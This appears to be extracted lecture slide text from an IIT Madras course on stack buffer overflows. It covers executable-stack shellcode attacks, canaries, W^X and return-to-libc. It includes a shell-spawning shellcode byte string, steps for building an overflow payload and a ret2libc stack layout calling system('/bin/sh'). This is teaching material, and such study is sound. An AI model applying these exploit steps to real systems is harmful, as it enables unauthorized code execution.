Milan Patnaik
Indian Institute of Technology Madras
https://www.cvedetails.com/
BUFFER OVERFLOWS
BUFFER OVERFLOWS : STACK
https://www.mitre.org/
BUFFER OVERFLOWS : STACK
https://www.mitre.org/
CVE-2021 : 152
AGENDA : CLASS
5
 Buffer Overflow
• Executable Stack Attacks
• Executable Stack Attack Prevention
 Canaries, W^X
• Non-Executable Stack Attacks
 Return-to-Libc attack
 Return Oriented Programming
• Non-Executable Stack Attack Prevention
 ASLR
• Heap Exploits
AGENDA : LABS
6
 Lab1a.
• Executable Stack Attacks.
 Lab1b.
• Return-to-Libc attack.
 Lab2a.
• Return Oriented Programming.
 Lab2b.
• Exploiting Large Binaries.
7
EXECUTABLE STACK ATTACKS
7
8
8
 Two parts
• Subvert execution:
• change the normal execution behavior of the program.
 Payload:
• the code which the attacker wants to execute.
PARTS OF BINARY EXPLOITS
SUBVERT EXECUTION
 In application software.
• SQL Injection.
 In system software.
• Buffers overflows and overreads.
• Heap: double free, use after free.
• Integer overflows.
• Format string.
• Control Flow.
 In peripherials.
• USB drives in Printers.
 In Hardware.
• Hardware Trojans.
 Covert Channels.
• Can exist in hardware or
software.
These do not really subvert execution,
but can lead to confidentiality attacks.
BUFFER OVERFLOWS IN THE STACK
 We need to first know how a stack is managed.
[1] Chris Anley, Felix Lindner, and John Heasman, “The Shellcoder's Handbook “
BUFFER OVERFLOWS IN THE STACK
• Executable stacks.
11
[1] Chris Anley, Felix Lindner, and John Heasman, “The Shellcoder's Handbook “
STACK IN A PROGRAM
(WHEN FUNCTION IS EXECUTING)
EBP
Parameters
for function
return Address
Locals of
function
prev frame
pointer
push $3
push $2
push $1
Stack
call function
push %ebp
movl %esp, %ebp
sub $20, %esp
%ebp: Frame Pointer
In main In function
ESP
ESP
ESP
ESP
ESP
ESP
%esp : Stack Pointer
STACK USAGE (EXAMPLE)
Stack (top to bottom):
address stored data
1000 to 997 3
996 to 993 2
992 to 989 1
988 to 985 return address
984 to 981 %ebp (stored
frame pointer)
(%ebp)980 to 976 buffer1
975 to 966 buffer2
(%esp) 965stack pointer
Parameters
for function
Return Address
Locals of function
prev frame pointer
frame pointer
STACK USAGE contd
Stack (top to bottom):
address stored data
1000 to 997 3
996 to 993 2
992 to 989 1
988 to 985 return address
984 to 981 %ebp (stored
frame pointer)
(%ebp)980 to 976 buffer1
975 to 966 buffer2
(%esp) 965
What is the output of the following?
 printf(“%x”, buffer2) : 966
 printf(“%x”, &buffer2[10])
976  buffer1[0]
Therefore buffer2[10] = buffer1[0]
A BUFFER OVERFLOW
MODIFYING THE RETURN ADDRESS
buffer2[19] =
&arbitrary memory location
Stack (top to bottom):
address stored data
1000 to 997 3
996 to 993 2
992 to 989 1
988 to 985
984 to 981 %ebp (stored
frame pointer)
(%ebp)980 to 976 buffer1
976 to 966 buffer2
(%esp) 965
Return Address
19
MODIFYING THE RETURN ADDRESS
buffer2[19] =
&arbitrary memory location
Stack (top to bottom):
address stored data
1000 to 997 3
996 to 993 2
992 to 989 1
988 to 985
984 to 981 %ebp (stored
frame pointer)
(%ebp)980 to 976 buffer1
976 to 966 buffer2
(%esp) 965
Return Address
19
Payload Location
16
BIG PICTURE OF THE EXPLOIT
Fill the stack as follows.
(where BA is buffer address)
stack pointer
Parameters
for function
Return Address
buffer
prev frame pointer
frame pointer
Exploit code
BA
BA
buffer Address
BA
BA
BA
BA
BA
BA
BA
FIND LOCATION OF RETURN ADDRESS
 Fill the stack with random values and run the program.
 Check the address in fault.
 Find the offset from values.
stack pointer
Parameters
for function
Return Address
buffer
prev frame pointer
frame pointer
R3
R4
R5
R6
R7
R8
R9
R10
18
R2
R1
Segmentation
Fault
R6 ??
PAYLOAD
 Lets say the attacker wants to spawn a shell
 ie. do as follows:
19
STEP 1 : GET MACHINE CODES
 objdump –disassemble-all shellcode.o
 Get machine code : “eb 1e 5e 89 76 08 c6
46 07 00 c7 46 0c 00 00 00 00 b8 0b 00 00
00 89 f3 8d 4e 08 8d 56 0c cd 80 cd 80”
 If there are 00s replace it with other
instructions
STEP 2: FIND BUFFER OVERFLOW
O
O
O
O
o
Defined on stack
21
STEP 3 : PUT MACHINE CODE IN LARGE STRING
shellcode
large_string
STEP 3 (contd) : FILL UP LARGE STRING WITH BA
shellcode BA BA BA BA BA BA BA BA
large_string
Address of buffer is BA
23
FINAL STATE OF STACK
• Copy large string into buffer.
• When strcpy returns the exploit code
would be executed.
shellcode BA BA BA BA BA BA BA BA
large_string
shellcode
BA
BA
buffer Address
BA
BA
BA
BA
BA
BA
BA
buffer
BA
PUTTING IT ALL TOGETHER
bash$ gcc overflow1.c
bash$ ./a.out
$sh
25
AN ALTERNATE
Fill the stack as follows.
(where BA is buffer address)
stack pointer
Parameters
for function
Return Address
buffer
prev frame pointer
frame pointer
BA
BA
buffer Address
BA
BA
BA
BA
BA
BA
BA
26
Exploit code
BA
BA
ACCURACY
 Increase accuracy by NOP Sledge.
DEFENSES
 Eliminate program flaws that could lead to subverting of execution.
• Safer programming languages, Safer libraries, hardware
enhancements, static analysis .
 If can’t eliminate, make it more difficult for malware to subvert
execution.
• W^X , ASLR, canaries.
 If payload still manages to execute, try to detect its execution at
runtime.
• payload run-time detection techniques using learning techniques,
ANN and payload signatures.
 If can’t detect at runtime, try to restrict what the malware can do.
• Sandbox system
 so that payload affects only part of the system, access
control, virtualization, trustzone, SGX.
• Track information flow
 DIFT, ensure payload does not steal sensitive information.
PREVENTING BUFFER OVERFLOWS
WITH CANARIES AND W^X
CANARIES
Stack (top to bottom):
stored data
3
2
1
ret addr
sfp (%ebp)
Insert canary here
buffer1
buffer2
 Known (pseudo random) values
placed on stack to monitor buffer
overflows.
 A change in the value of the canary
indicates a buffer overflow.
 Will cause a ‘stack smashing’ to be
detected.
Insert a canary here
check if the canary value
has got modified
CANARIES AND GCC
 As on gcc 4.4.5, canaries are not added to functions by default.
 Could cause overheads as they are executed for every
function that gets executed.
 Canaries can be added into the code by –fstack-protector
option.
 If -fstack-protector is specified, canaries will get added
based on a gcc heuristic.
• For example, buffer of size at-least 8 bytes is allocated.
• Use of string operations such as strcpy, scanf, etc.
 Canaries can be evaded quite easily by not altering the contents
of the canary.
CANARaIES EXAMPLE
Without canaries, the return address on stack gets overwritten resulting in
a segmentation fault. With canaries, the program gets aborted due to stack
smashing.
CANARIES EXAMPLE
 Without canaries, the return address on stack gets overwritten resulting in
a segmentation fault. With canaries, the program gets aborted due to stack
smashing.
CANARY INTERNALS
Store canary onto
stack
Verify if the canary
has changed
Without canaries
With canaries
gs is a segment that shows thread local data; in this case it is
used for picking out canaries
NON EXECUTABLE STACKS (W^X)
 In Intel/AMD processors, ND/NX bit present to mark non code
regions as non-executable.
• Exception raised when code in a page marked W^X executes.
 Works for most programs.
• Supported by Linux kernel from 2004.
• Supported by Windows XP service pack 1 and Windows
Server 2003.
• Called DEP – Data Execution Prevention
 Does not work for some programs that NEED to execute from the
stack.
•Eg. JIT Compiler, constructs assembly code from external data
and then executes it.
(Need to disable the W^X bit, to get this to work)
Will non executable stack prevent buffer overflow attacks ?
Return – to – LibC Attacks
RETURN TO LIBC
Exploit code
BA
BA
BA
BA
BA
BA
BA
BA
buffer
This will not work if ND bit is set
Return Address
RETURN TO LIBC
(Replace return address to point to a function within libc)
F1 Addr
F1 Addr
F1 Addr
F1 Addr
F1 Addr
F1 Addr
F1 Addr
F1 Addr
buffer
Return Address
F1 Addr
Stack
Heap
Stack
Heap
DataData
TextText
Bypasses W^X since F1 is in the code segment,
And can be legally executed.
F1 = System()
 One option is function system present in libc
system(“/bin/bash”)
would create a bash shell
(there could be other options as well)
 So we need to :•
Find the address of system in the program.
(does not have to be a user specified function, could be a
function present in one of the linked libraries)
• Supply an address that points to the string /bin/sh.
THE RETURN-TO-LIBC ATTACK
F1ptr
F1ptr
F1ptr
F1ptr
F1ptr
Shell ptr
F1 ptr
F1ptr
buffer
F1ptr
Return Address
system()
In libc
/bin/bash
UNDERSTAND THE STACK
[1] Chris Anley, Felix Lindner, and John Heasman, “The Shellcoder's Handbook “
UNDERSTAND THE STACK
[1] Chris Anley, Felix Lindner, and John Heasman, “The Shellcoder's Handbook “
UNDERSTAND THE STACK
[1] Chris Anley, Felix Lindner, and John Heasman, “The Shellcoder's Handbook “
SYSTEM CELL
[1] Chris Anley, Felix Lindner, and John Heasman, “The Shellcoder's Handbook “
FIND ADDRESS OF SYSTEM IN THE EXECUTABLE
FIND ADDRESS OF /bin/sh
 Every process stores the enviroment variables
at the bottom of the stack.
 We need to find this and extract the string
/bin/sh from it.
FIND ADDRESS OF /bin/sh
THE FINAL EXPLOIT STACK
xxx
xxx
xxx
0x28085260
dead
0xbfbffe25
xxx
xxx
buffer
xxx
Return Address
system()
In libc
/bin/sh
A CLEAN EXIT
xxx
xxx
xxx
0x28085260
0x281130d0
0xbfbffe25
xxx
xxx
buffer
xxx
Return Address
system()
In libc
/bin/bash
exit()
In libc
LIMITATION OF RET2LIBC
 Limitation on what the attacker can do.
(only restricted to certain functions in the library)
 These functions could be removed from the library.
THE ATTACKER’S PLAN
 Find the bug in the source code (for eg. Kernel) that can be
exploited.
• Eyeballing.
• Noticing something in the patches.
• Following CVE.
 Use that bug to insert malicious code to perform something
nefarious.
• Such as getting root privileges in the kernel.
 Attacker depends upon knowning where these functions reside
in memory. Assumes that many systems use the same address
mapping. Therefore one exploit may spread easily.